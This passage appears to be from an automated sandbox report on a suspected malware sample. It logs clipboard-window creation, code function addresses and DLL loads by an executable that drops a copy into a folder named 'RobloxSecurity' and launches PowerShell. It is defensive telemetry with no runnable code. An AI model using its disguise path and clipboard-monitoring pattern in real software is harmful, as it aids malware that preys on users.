                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_02B8E00C
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_06258E50
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_0625A268
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_06250006
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_06250040
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_067EEDD1
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_06EF04F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04F5B490
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04F5B471
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08803A98
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeCode function: 4_2_00007FFD9B9A2B4C
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 11_2_00007FFD9B98830A
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 11_2_00007FFD9B972B4C
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 11_2_00007FFD9B989762
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 11_2_00007FFD9B987B8D
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 11_2_00007FFD9B977D15
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 18_2_00007FFD9B978B08
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 18_2_00007FFD9B9882EA
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 18_2_00007FFD9B972B4C
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 18_2_00007FFD9B989742
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 18_2_00007FFD9B987B6D
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 18_2_00007FFD9B977D59
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 42_2_00007FFD9B982B4C
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 42_2_00007FFD9B9806D1
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 42_2_00007FFD9B987D59
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 44_2_00007FFD9B962B4C
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 44_2_00007FFD9B967D59
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 45_2_00007FFD9B992B4C
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 45_2_00007FFD9B9978F5
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8072 -s 1632
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1796380426.0000000000CF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs jqOHOuPMJP.exe
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1797186606.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs jqOHOuPMJP.exe
                  Source: jqOHOuPMJP.exe, 00000000.00000000.1644125840.0000000000946000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLaps.exe4 vs jqOHOuPMJP.exe
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1817862177.0000000003DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHab9b84cf0be099b26b5d8bd8efac02917c.exeT vs jqOHOuPMJP.exe
                  Source: jqOHOuPMJP.exeBinary or memory string: OriginalFilenameLaps.exe4 vs jqOHOuPMJP.exe
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: version.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: propsys.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: edputil.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: netutils.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: slc.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: sppc.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: rasman.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: onecorecommonproxystub.dll
